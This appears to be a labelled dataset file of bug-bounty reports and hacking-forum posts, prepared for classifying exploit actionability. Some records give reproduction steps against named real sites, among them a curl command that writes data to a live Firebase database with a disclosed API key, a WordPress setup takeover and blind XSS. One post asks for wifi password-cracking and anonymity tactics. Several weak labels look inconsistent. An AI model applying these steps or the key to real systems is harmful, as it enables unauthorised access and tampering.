\\/nextcloud\\/33060\\/htdocs\\/lib\\/private\\/Route\\/Router.php\",\"line\":298,\"function\":\"main\",\"class\":\"OC\\\\AppFramework\\\\App\"},{\"file\":\"\\/snap\\/nextcloud\\/33060\\/htdocs\\/lib\\/base.php\",\"line\":1047,\"function\":\"match\",\"class\":\"OC\\\\Route\\\\Router\"},{\"file\":\"\\/snap\\/nextcloud\\/33060\\/htdocs\\/index.php\",\"line\":36,\"function\":\"handleRequest\",\"class\":\"OC\"}],\"previous\":{\"type\":\"Swift_TransportException\",\"message\":\"Connection could not be established with host 127.0.0.1 :stream_socket_client(): Unable to connect to 127.0.0.1:25 (Connection refused)\",\"code\":0,\"trace\":[{\"function\":\"{closure}\",\"class\":\"Swift_Transport_StreamBuffer\"},{\"file\":\"\\/snap\\/nextcloud\\/33060\\/htdocs\\/3rdparty\\/swiftmailer\\/swiftmailer\\/lib\\/classes\\/Swift\\/Transport\\/StreamBuffer.php\",\"line\":264,\"function\":\"stream_socket_client\"},{\"file\":\"\\/snap\\/nextcloud\\/33060\\/htdocs\\/3rdparty\\/swiftmailer\\/swiftmailer\\/lib\\/classes\\/Swift\\/Transport\\/Str", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b629986474cb294499d0", "text": "Making WIFI Hacking Great again, stimulating the WIFI-Hacking Community 2022\n\nI have enjoyed the concept of Wifi Hacking but it seems we have hit a wall. I’m gonna be honest and and say, methods and tutorials for WPS Pixie Attacks, Airgeddon, Wifite, Aircrack, Dictionary attacks through hashing even has become pretty over saturated over time and has led to little to no success. Due to this issue below I will put my thoughts on the current attacks/methods I more or less understand with an additional comment to think about to make better posts for the future so it does not become clutter over time and then something on Frag Attacks in regards to Wifi-Hacking which has caught my eye. PS: The comments are aimed toward obtaining Wifi Passwords. I understand pretty much all the tools mentioned do their job and do it well. Its about the “Passwords” part of Wifi-Hacking that seems a bit empty and stagnate lately, In My Opinion. Dictionary attacks - Takes too long even if hashed. What kind of recon would one have to do to help a dictionary attack be better prepared to Bruteforce. WPS attacks - Besides bashing on the fact that with every 6-12 months WPS attack success feels like it will hit 0% eventually excluding demo tests, You can have a Network say WPS enabled but if it’s not configured how would you know? How do you properly fine tune your wps pin attacks so you don’t get timed out as much or worse locked out or strategies around it. (While technically this information is out they don’t make it easy to understand and it’s the same as nothing.) Not mentioning fixing glitches or maybe legit reasons why common wps cracking scripts are always stuck on 1 pin testing it over and over. Evil Twin Attack - Cool and all until you realize that the “victim” has to go through a login page and convince them which even them which is literally only for clues… it’s especially difficult that even if they log a possible password or… a kind of credentials not having internet makes it suspicious but there’s a way around that. ARP Poisoning Relay attack - Nearly the same results as the Evil Twin attack but, This is easily detectable on certain networks and you could get flagged/blocked. Man In The Middle Attack ^ Krack Attack - nearly the same thing… ARP related, but Relaying a network without the SSL Strip in URL. -This is not really for Wifi passwords though Mac changer - Usually used only for Wifi with Login pages, Paid wifi… and things of that nature but slap in some regular WEP/WPA/WPA2/WPA3 password and Poof method is terrible. -Although… there is some theoretical usage of Authentication with this on regular WIFI networks but I have not seen any solid documentation yet. Now for something I would like to see on user posted experiments and tutorial steps for achieved results and how to stay anonymous also while performing such attacks as always with every attack (Usually people do not make their tutorials intertwined with those critical steps for the real world.) Frag Attacks: What Are Wi-Fi Frag Attacks and How Can You Protect Against Them? Short for “fragmentation” and “aggregation”, Frag attacks allow hackers to bypass firewalls to inject code into Wi-Fi traffic. A new set of vulnerabilities known as Frag attacks have been discovered in Wi-Fi-enabled devices. A website that rather you clicking on my link I rather just search the necessary keywords on your favorite web browser to get to the same place to reduce risk in general for you as a user. https://www.fragattacks.com/ This website has a ton of documentation of this kind of attack and recently I got an understanding on the attack. Even though this is a great source and Youtube has 2-3 videos on this attack by the same person, It’s more of a demo where not everything is explained in the best way possible. Simply because it’s a demo, not a tutorial. This is their github: GitHub - vanhoefm/fragattacks -same warning in regards to the link above… I attempted to “install” everything I needed but it may be the high level vocabulary of Linux related devices and interfaces and directories and… d", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-06-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ac75a391ff950fcedd9a", "text": "[Cleartext Transmission of Sensitive Information] CVE-2022-42916: HSTS bypass via IDN\n\nOriginal Report:https://hackerone.com/reports/1730660\n\n## Impact\n\nHSTS bypass.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-42916"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ee50fa690073b2181f79", "text": "[Cross-site Scripting (XSS) - Generic] XSS on internal: privileged origin through reader mode\n\n## Summary:\n\nBrave iOS has two weaknesses described below. By combining them, XSS can be achieved on the privileged origin `internal://local`.\n\n1. Exposure of uuidKey through REFERER header\nReader mode in Brave has two HTML templates, [Reader.html](https://github.com/brave/brave-ios/blob/development/Client/Frontend/Reader/Reader.html) and [ReaderViewLoading.html](https://github.com/brave/brave-ios/blob/development/Client/Frontend/Reader/ReaderViewLoading.html). The former template defines [](https://github.com/brave/brave-ios/blob/development/Client/Frontend/Reader/Reader.html#L10) header for preventing referrer leakage, but the latter template [does not](https://github.com/brave/brave-ios/blob/development/Client/Frontend/Reader/ReaderViewLoading.html#L8). Therefore, by opening an external page through `ReaderViewLoading.html`, the `uuidKey` contained in the Reader mode page URL is leaked.\n\n2. XSS in SessionRestoreHandler\nSessionRestoreHandler is used to restore a previously used tab, but [it does not validate an URL to be restored](https://github.com/brave/brave-ios/blob/83eb41ac922d7bd18fd311e0a4279e02cdd8e190/Client/Frontend/Browser/SessionRestoreHandler.swift#L34). Therefore, if a javascript: URL is provided, the code is executed on the `internal:` domain.\n\nNote that the first vulnerability is not reproduced on iOS 15 because WKWebView's referrer policy has been changed to hostname only. However, according to [Apple's report in June 2021](https://developer.apple.com/support/app-store/), more than 90% of users were using iOS 14.\n\n## Products affected: \n\n* Brave iOS 1.32.3 and higher (include the latest Nightly) on iOS 14.x and below\n\n## Steps To Reproduce:\n\n* Visit https://csrf.jp/brave/reader_uuid_leakage.php\n* Open the page in Reader mode\n* Long tap a hyperlink in the page and choose \"Open in New Private Tab\"\n* Wait for several seconds and tap \"Load original page\"\n* uuidKey in the reader mode URL is stolen through REFERER header\n* Click an exploit URL in the page, then XSS is triggered on `internal://local`\n\n## Supporting Material/References:\n\n* xss_on_internal_origin_through_reader_mode.mov: video of the attack against the vulnerabilities\n* reader_uuid_leakage.php: server-side exploit code\n\n## Impact\n\n* Attacker can elevate privileges to `internal:` origin", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "be8b9e81d2e4e52d3399", "text": "Same problem, the question asks only for the switch and the variable and it stays like this “dst host 10.10.20.1” or “dst 10.10.20.1” but with none", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "dbf13ac2812e91d5c15e", "text": "[Cleartext Storage of Sensitive Information] Biometric key is stored in Windows Credential Manager, accessible to other local unprivileged processes\n\nBitwarden Desktop on Windows allows the user to enable vault unlock through Windows Hello (under File > Settings > Unlock with Windows Hello). When this is done, a \"Biometric master key\" is generated and stored locally inside the Windows' user credential set. This is done through the \"wincred\" API, in particular through the functions [CredWrite](https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credwritew) and [CredRead](https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credreadw) that are called from the native module written in Rust ([here: `apps/desktop/desktop_native/src/password/windows.rs`](https://github.com/bitwarden/clients/blob/desktop-v2023.1.1/apps/desktop/desktop_native/src/password/windows.rs)). The item created in the user credential set has a name of the form `Bitwarden_biometric/_masterkey_biometric`.\n\nWhen unlocking the vault through Windows Hello, the unlock operation prompts the user for authentication through Windows Hello ([here: `apps/desktop/src/main/biometric/biometric.windows.main.ts` line 45](https://github.com/bitwarden/clients/blob/desktop-v2023.1.1/apps/desktop/src/main/biometric/biometric.windows.main.ts#L45)). If the authentication succeeds, the vault is unlocked and the items are decrypted after decrypting the master keys through the keys derived from the biometric master key.\n\nHowever, the authentication through Windows Hello is unneeded. Commenting the line linked above, the vault still unlocks with no problem. The biometric master key can in fact be retrieved with a simple call to the `CredRead` windows API function, and then used to decrypt the locally saved data present in `%appdata%\\Bitwarden\\data.json`. The Windows Hello authentication prompt therefore gives a false sense of security to the user, making it seem as if authentication is *needed* to decrypt vault data, when in reality it is not.\n\nThe local data in `%appdata%\\Bitwarden\\data.json`, as well as the master biometric key, persist after the vault is locked and the Bitwarden desktop allication is closed. Both of them are easily readable by any program running in the current user session, without the need to elevate privileges. Furthermore, both are accessible to any administrator account on the same machine.\n\nGiven the above, a potentially malicious program running locally on the machine can decrypt the entirety of the user vault, i.e. all ciphers (logins, cards, notes, identities). Furthermore, since the Desktop application stores locally (still in `%appdata%\\Bitwarden\\data.json`) a refresh token and a bearer token used for authentication with the Bitwarden server, user data can easily be modified, encrypted and updated on the server on behalf of the user.\n\nThe attached proof of concept (of which a recorded video demo is also attached) consists of a Python 3 script that uses the `ctypes` module to extract the biometric master key (if any) from the current user's credential set, decrypts all cipher names stored locally, and also modifies and updates the content of a secret note with a specific (if present), sending the new data to the server through standard bitwarden API.\n\nThe setup needed before running the proof of concept script is as follows:\n\n1. Create a test account on https://vault.bitwarden.com/#/register (or use an existing one at your own risk).\n2. Login to the test account and create some items in the vault for testing purposes. In particular, among them create a *secure note* with name `Super Secret Note` and arbitrary content.\n3. Download and install the latest Bitwarden Desktop client **for Windows** from https://bitwarden.com/download/ (make sure to install on a PC that supports Windows Hello biometric authentication in order to enable it).\n3. Use the installed desktop client to log in to the test account using the master password.\n5. Enable Windows Hello authentication through File > Settings > \"Unlock with", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "58f70e4474b7d8b3f31f", "text": "[Information Exposure Through an Error Message] Install.php File Exposure on Drupal\n\nIn the security assessment, it was discovered that the install.php file located at ██████/core/install.php is accessible and returns a 200 status code. Since the installation process is not possible, it is essential to address the vulnerability of the install.php file as soon as possible to prevent potential attacks and ensure the availability of the website. It is important to take measures to remove or secure the file to prevent it from being accessed by attackers and causing a denial of service attack. This is crucial to prevent the website from crashing and overwhelming the system, which can lead to serious problems for the website and its users.\n\nObs:\n* Use the drupwn tool, found at https://github.com/immunIT/drupwn\n* Run the command: python3 ./drupwn --mode enum --target ██████/\n* The tool will reveal the install.php script with a status of **200 OK**.\n\n████\n\n## Summary\nThe install.php file, which is meant to be removed after the initial installation of Drupal, has been left in place and is accessible to attackers. This file can be used to reinstall the website, potentially leading to data loss or other issues. Additionally, it was observed that the website encountered an unexpected error of Drupal\\Component\\Plugin\\Exception\\PluginNotFoundException: Unable to determine class for field type 'comment' which can be used to escalate privilege and access sensitive information.\n\n## Proof Of Concept \nProof of Concept: A screenshot demonstrating the install.php file being accessible and the error is displayed\n█████████\n\n**My IP Report:**\n████ \n\n## References\n\n## Impact\n\nBy accessing the install.php file, an attacker could potentially reinstall the website, leading to data loss or other issues. Additionally, the error displayed may also be used to escalate privilege and access sensitive information.\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\nDrupal 8 or >\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Open a web browser and navigate to █████/core/install.php\n2. Observe that the install.php file is accessible and returns a 200 status code\n\n## Suggested Mitigation/Remediation Actions\nThe install.php file should be removed from the website to prevent unauthorized access and the error should be fixed to prevent privilege escalation. Additionally, it is recommended to review all the configurations and modules to verify if there are any misconfigurations or vulnerabilities.\n\nIt is important to note that an attacker could use this vulnerability to cause a significant amount of stress on the website by repeatedly accessing the install.php file, potentially causing the website to crash. This is why it's important to report this vulnerability and fix it as soon as possible.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "5c538a4882e7a760f633", "text": "for to get flag 5 you can use LES (Linux Exploit Suggester). I know it’s a hint, so don’t hate me. Try every vulnerability that the script will offer you. github.com GitHub - The-Z-Labs/linux-exploit-suggester: Linux privilege escalation auditing tool Linux privilege escalation auditing tool", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-05-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8d584e2e18fd0ad021b5", "text": "The very last question regarding the “other user” in conjuction with RockYou-30. This question has been an issue for quite some people here…", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-02-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9e60e768674e11247ac7", "text": "[Information Disclosure] installed.json sensitive file was publicly accessible on your web application which discloses information about authors and admins\n\n##kindly if you don't accept this issue please close it as informative , thanks in advance \n\n##Description:\nThe installed.json file is a sensitive file and it was publicly accessible on your webserver , which discloses some information about your web site and users such as authors like admin as shown below:\n`\"authors\": [\n {\n \"name\": \"Modern Tribe\",\n \"email\": \"admin@tri.be\"\n }\n`\n\n##Steps to Produce:\n1. Go to https://blog.yelp.com/vendor/composer/installed.json\n\n##References :\nhttps://www.acunetix.com/vulnerabilities/web/composer-installed-json-publicly-accessible/\nhttps://hackerone.com/reports/461598\n\n##Remediation:\nRestrict Access to vendors directory\n\n## Impact\n\nDisclosure of information about components used by the web application.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2d8f06164d986ea6d4ed", "text": "[Cleartext Storage of Sensitive Information] Exposed GIT repo on ██████████[HtUS]\n\nGit metadata directory (.git) was found in this folder. An attacker can extract sensitive information by requesting the hidden metadata directory that version control tool Git creates. The metadata directories are used for development purposes to keep track of development changes to a set of source code before it is committed back to a central repository (and vice-versa). When code is rolled to a live server from a repository, it is supposed to be done as an export rather than as a local working copy, and hence this problem.\n\n███████\n\n```\nSome of Repository files/directories:\n├── private\n│   ├── Gruntfile.js\n│   ├── bootstrap.php\n│   ├── build.js\n│   ├── classes\n│   │   ├── Config.php\n│   │��  ├── Controller.php\n│   │   ├── Database.php\n│   │   ├── DatabaseResult.php\n│   │   ├── DatabaseResultRow.php\n│   │   ├── DebugLog.php\n│   │   ├── Dictionary.php\n│   │   ├── FileUploader.php\n│   │   ├── ImageUploader.php\n│   │   ├── Importer.php\n│   │   ├── Installer.php\n│   │   ├── ModelController.php\n│   │   ├── Modeler.php\n│   │   ├── Palm\n│   │   │   ├── Controller.php\n│   │   │   ├── ProblemFetcher.php\n│   │   │   └── Status.php\n│   │   ├── PalmBrowser.php\n│   │   ├── Perls\n│   │   │   ├── Controller.php\n│   │   │   └── UserManager.php\n│   │   ├── Request.php\n│   │   ├── Router.php\n│   │   ├── UploadController.php\n│   │   ├── UserLogin.php\n│   │   ├── XmlImporter.php\n│   │   └── xAPI\n│   │   ├── Builder.php\n│   │   ├── Controller.php\n│   │   └── Logger.php\n│   ├── config.json\n│   ├── controllers\n│   │   ├── Author\n│   │   │   ├── Applications.php\n│   │   │   ├── Categories.php\n│   │   │   ├── DefaultParameters.php\n│   │   │   ├── Globals.php\n│   │   │   ├── Images.php\n│   │   │   ├── Lists.php\n│   │   │   ├── Modules.php\n│   │   │   ├── ProblemLayouts.php\n│   │   │   ├── ProblemTemplates.php\n│   │   │   ├── Problems.php\n│   │   │   ├── Publish.php\n│   │   │   ├── Tags.php\n│   │   │   ├── Unpublish.php\n│   │   │   ├── UploadImage.php\n│   │   │   └── Users.php\n│   │   ├── Import\n│   │   │   ├── Parse.php\n│   │   │   └── Submit.php\n│   │   ├── Palm\n│   │   │   ├── Browse.php\n│   │   │   ├── Load.php\n│   │   │   ├── Problem.php\n│   │   │   ├── Reset.php\n│   │   │   └── Sequence.php\n│   │   ├── Perls\n│   │   │   ├── ListModules.php\n│   │   │   ├── ProbeProblems.php\n│   │   │   ├── RequestPalm.php\n│   │   │   ├── SampleProblems.php\n│   │   │   └── UserStatus.php\n│   │   ├── User\n│   │   │   ├── ConfirmEmail.php\n│   │   │   ├── Consent.php\n│   │   │   ├── Login.php\n│   │   │   ├── Logout.php\n│   │   │   ├── Register.php\n│   │   │   ├── ResetPassword.php\n│   │   │   ├── Save.php\n│   │   │   ├── Touch.php\n│   │   │   ├── Unique.php\n│   │   │   └── VerifyEmail.php\n│   │   └── xAPI\n│   │   ├── Categories.php\n│   │   ├── Modules.php\n│   │   ├── Problems.php\n│   │   ├── Statements.php\n│   │   └── Users.php\n│   ├── install.xml\n│   ├── models\n│   │   ├── Applications.php\n│   │   ├── Categories.php\n│   │   ├── FileTags.php\n│   │   ├── GlobalParameters.php\n│   │   ├── ImageTypes.php\n│   │   ├── Images.php\n│   │   ├── Lists.php\n│   │   ├── Modules.php\n│   │   ├── ProblemLayouts.php\n│   │   ├── ProblemTemplates.php\n│   │   ├── Problems.php\n│   │   └── Users.php\n│   ├── package.json\n│   ├── sql\n│   │   ├── application_parameters.sql\n│   │   ├── applications.sql\n│   │   ├── categories.sql\n│   │   ├── category_parameters.sql\n│   │   ├── category_prerequisites.sql\n│   │   ├── completed_modules.sql\n│   │   ├── file_tags.sql\n│   │   ├── global_parameters.sql\n│   │   ├── image_tag_map.sql\n│   │   ├── image_types.sql\n│   │   ├── images.sql\n│   │   ├── lists.sql\n│   │   ├── module_parameters.sql\n│   │   ├── modules.sql\n│   │   ├── performances.sql\n│   │   ├── priorities.sql\n│   │   ├── problem_graph.sql\n│   │   ├── problem_layouts.sql\n│   │   ├── problem_parameters.sql\n│   │   ├── problem_templates.sql\n│   │   ├── problems.sql\n│   │   ├── problems_logged.sql\n│   │   ├── retired_categories.sql\n│   │   ├── user_authentication.sql\n│   │   ├── use", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "da53d5c344fe2da4ed59", "text": "[Information Disclosure] store internal email disclosed through shopify-data-exporter\n\n## Summary:\nHey Shopify,\n\nWhen a store install ```shopify-data-exporter``` app to export various data of the store a link is sent to the store internal email. This internal email is disclosed via the below request to anyone \n```json\nGET /?shop=your_store.myshopify.com HTTP/2\nHost: shopify-data-exporter.shopifycloud.com\n```\n{F1779393}\n\n## Shops Used to Test:\n[xentest11.myshopify.com]\n\n## Relevant Request IDs:\n[54bb78a050a2fddbc3ae360ff72d1d3e]\n\n## Steps To Reproduce:\n\n 1. Install ```shopify-data-exporter``` in your store (```https://apps.shopify.com/data-exporter-tax-compliance```)\n 2. After installing the app just add your store link in ```shop``` parameter in the above shown request\n 3. In the response check for ```data-recipient``` attribute. It exposes the internal store email.\n\n## Impact\n\nStore internal email disclose to anyone in ```shopify-data-exporter.shopifycloud.com?shop=``` via ```data-recipient``` attribute", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1629ea06028563536819", "text": "[Cross-site Scripting (XSS) - Generic] Blind XSS in app.pullrequest.com/████████ via /reviews/ratings/{uuid}\n\n**Summary:**\nHi,\n\nWhile researching PullRequest yesterday, I saw some \"review\" endpoints in web archive of \"app.pullrequest.com\". (http://web.archive.org/cdx/search/cdx?url=app.pullrequest.com/*&output=text&fl=original&collapse=urlkey)\n\nOne of them was https://app.pullrequest.com/reviews/ratings/6eaa6b75-b958-4530-ba46-0d00cbe74e0b/false , I went to that endpoint and filled the all fields with my blind XSS payload.\n`'\">`\n\nThis payload sends an alert to my blind XSS application in `██████`\n\nToday (May 3, 2022, 6:09 pm UTC+3), I got a lot of alerts from https://app.pullrequest.com/███. I checked the report and I see it came from an PullRequest admin who checks reviews. \n\nHere is a screenshot from the report :\n\n███████\n\nI checked the HTML source code and I see my payload reflected to `Disliked_reviewers`, `Liked_reviewers` and `Reasons` fields without any encoding. \n\nYou can also check the source code : █████████\n\n## Impact\n\nBlind XSS in PullRequest admin portal\n\nRegards,\nBugra", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "02b7dfaeb18cef8c24b2", "text": "The “other user” on that system found is “g.potter”. Are we still talking about that one?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-03-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "aa1e72d54d3eb5aff9a9", "text": "[Unknown] Add me email address Authentication bypass\n\nhi, this vulnerability can able to access user account without email verification in linkedins' add me email address function page. user add mail2 email address. without mail2 email address verification user can fully access mail1 linkedin account using mail2 email address. \n\nIn linkedin mobile application, we can add second email address, and its display \"We can't use this email for your account until you verify it.\" so, it'll play authentication logic error.\n\nTO REPRODUCE :\n1. have account mail1 & mail2.\n2. login to mail1 linkedin account.\n3. go to https://www.linkedin.com/psettings/email , add mail2 email address.\n4. then remove mail2 email address.\n5. linkedin sent verification link to mail2s' gmail.\n6. copy this link, open private tab and paste it.\n7. click signin button and type mail1s' password.\n8. will login successfully.\n\nATTACHED Detailed Reproduce Video below\n\n## Impact\n\nUser/attacker can login successfully without email verification and also, authentication logic error happened. login using unverified email address, can't notify login successful message in the primary email address. email2 login n-no. of time without verification, and also can't notify login message to mail1(primary email) gmail account.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c1afc1a091e02076c263", "text": "[Misconfiguration] Wordpress Takeover using setup configuration at http://████.edu [HtUS]\n\nDescription:\n\nThe WordPress 'setup-config.php' installation page allows users to install\nWordPress in local or remote MySQL databases. This typically requires a user\nto have valid MySQL credentials to complete. However, a malicious user can\nhost their own MySQL database server and can successfully complete the\nWordPress installation without having valid credentials on the target system.\n\n\nReproduce step by step:\n\nI found this vulnerable url:\nhttp://███.edu/old/wp-admin/setup-config.php\n\nThen i configured db \nI used this site https://www.freemysqlhosting.net/\n\nAfter configure I got wordpress admin access\n\nproof:\nhttp://██████████.edu/old/rce.txt\n\n\nAdmin credentials that I set after installing the config\nusername: ████████\npassword: ███\n\nLogin Panel: http://████████.edu/old/wp-login.php\n\nVideo POC has been attached as well.\n\n## Impact\n\nImpact\nRemote Code Execution/Total system compromise.\nAttacker can upload webshell into the server. I did not upload any shell for security violation.\n\nMalware distribution\nPhishing / Spear phishing\nXSS\nAuthentication bypass", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "447bde114c7372d94d79", "text": "Any hints for flag4? Pulling my hair out with it at the moment and getting nowhere No matter…I have it…I was focusing too much on the one thing", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c1e65eb13e6b2ec8f8f9", "text": "NFORMATION GATHERING - Virtual Hosts\n\nHi! I am stuck for a few days now, and I’m don’t know what I’m doing wrong. The question is: Enumerate the target and find a vHost that contains flag No. 1. Submit the flag value as your answer (in the format HTB{DATA}). When I’m doing FFUF on it, and want to go to for example blog.inlanefreight.htb than everything is the same webpage. The webpage from the Ubuntu Apache page. When i go to HTTP://inlanefreight.htb than I got a flag 1, but when I fill it in, it said that it isn’t the write answer. I added the findings from FFUF to /etc/hosts/ with the given target-ip. Can anyone tell me what I’m doing wrong, please?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-07-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "18998e618613ca944a77", "text": "[Insecure Storage of Sensitive Information] Firebase Database Takeover in https://pulseradio.mtn.co.ug/\n\n## Summary:\nDuring my test , in one of the subdomain of mtn.co.ug I found firebase configuration disclosed in the source code along with apiKey and database URL . \n\nExploiting this vulnerability attacker is able to upload malicious data in the firebase account of pulseradio.mtn.co.ug and see database over there .\n\n## Steps To Reproduce:\n\nPOC : https://mtn-pulse-uganda.firebaseio.com/poc.json\n\n1. Go to URL below and view the source code of website .\n\nview-source:https://pulseradio.mtn.co.ug/wp-content/themes/mtn-pulse-reskin/zero-rate/firebase-config.js\n\nThere you will see following sensitive data .\n\n$(document).ready(function() {\n\t\t\t// Your web app's Firebase configuration\n\t\t\tvar firebaseConfig = {\n\t\t\t\tapiKey: \"AIzaSyCRrABG3_Sc7xHar70hFyjHjEOJ071rbJ4\",\n\t\t\t\tauthDomain: \"mtn-pulse-uganda.firebaseapp.com\",\n\t\t\t\tdatabaseURL: \"https://mtn-pulse-uganda.firebaseio.com\",\n\t\t\t\tprojectId: \"mtn-pulse-uganda\",\n\t\t\t\tstorageBucket: \"mtn-pulse-uganda.appspot.com\",\n\t\t\t\tmessagingSenderId: \"242450689592\",\n\t\t\t\tappId: \"1:242450689592:web:bdd1173378d94d733800cd\",\n\t\t\t\tmeasurementId: \"G-KHPT64LJ5L\"\n\t\t\t};\n\n\n2. Now lets upload some data in firebase database . Send the following curl request . Your data will be uploaded to firebase .\n\n\n curl \"https://mtn-pulse-uganda.firebaseio.com/poc1.json\" -XPUT -d '{\"attacker\":\"maliciousdata\"}'\n\n3. Your data will be uploaded to https://mtn-pulse-uganda.firebaseio.com/poc1.json\n\n\n\nReferences:\nThere are guidelines available by Firebase to resolve the insecurities and misconfiguration, please follow this link:\nhttps://firebase.google.com/docs/database/security/resolve-insecurities\n\n## Impact\n\nThis is quite serious because by using this database attacker can use this for malicious purposes and also an attacker can track this database if mtn uses it for future perspective and at that time it will be much easier for the attacker to steal the data from this repository and later it will harm the reputation of the mtn.co.ug .\n\nSo please immediately change the rule of the database to private so that nobody can able to access it outside.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b6ee5d0af0d5db8d82a9", "text": "[Phishing] UI spoofing by showing sms:/tel: dialog on another website\n\n## Summary:\nThe dialog asking if you want to open the sms:/tel: link doesn't show the caller origin.\nAlso, unlike the JavaScript alert dialog, etc., it appears on the top screen even when another tab is active.\nThis can be used for UI spoofing attack to make it looks as if another site is displaying the dialog.\n\n## Products affected: \n\n * Brave for iOS (Version 1.45.2)\n\n## Steps To Reproduce:\n\n * Visit https://csrf.jp/brave/sms.php\n * Tap \"Click Me\" button\n * google.com is opened in the new tab\n * Confirmation dialog for sms: link is shown on google.com\n\n## Supporting Material/References:\n\n * See the demonstration movie I attached\n\n## Impact\n\nThis can be used for UI spoofing attack to make it looks as if another site is displaying the dialog.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "43235e1e9268d68aa004", "text": "[Information Disclosure] Email exploitation with web hosting services.\n\nExploitation steps:\n-------------------------------------\n\nYou must upload the PHP file to the public HTML.\n\nI created this PHP code for testing. And I uploaded it.\n\nMust check the permissions are checked.\n\nBasically, I can send emails to anyone using your organisation email list.\n\nI can also send emails to your organisation people.\n\nMost of the company are secure with this vulnerability.\n\nYou will find those emails in the primary section/ in the promotions section.\n\nPlease Carefully do everything it will happen must be.\n\n\nExploit code:\n---------------------\n\n\n\n## Impact\n\nA short explanation of why all organisations believe this is a technical security vulnerability.\n--------------------------------------------------------------------------------------------\n\nWhen I visited this domain [ https://█████████/ ]\n\nI found different types of emails from snov.io. And there are a lot of emails that are internal information about your organisation.\n\nThat should not be known to the public. An attacker can copy those emails and then they can do email spoofing or email\n\nbombing with those emails. If an attacker can use those emails he/she then can send messages, not from your organisation. He or she can write\n\nbad messages or wrong messages or false messages or scam messages to those victims. They can make a reputation loss.\n\nThey can send harmful news/false news/malicious files. They can do phishing attacks and steal the internal information of your organisation.\n\nSometimes it may occur different types of account hacks.\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nYou must upload the PHP file to the public HTML.\n\nI created this PHP code for testing. And I uploaded it.\n\nMust check the permissions are checked.\n\nBasically, I can send emails to anyone using your organisation email list.\n\nI can also send emails to your organisation people.\n\nMost of the company are secure with this vulnerability.\n\nYou will find those emails in the primary section/ in the promotions section.\n\nPlease Carefully do everything it will happen must be.\n\n## Suggested Mitigation/Remediation Actions", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-14", "split": "val", "label_source": 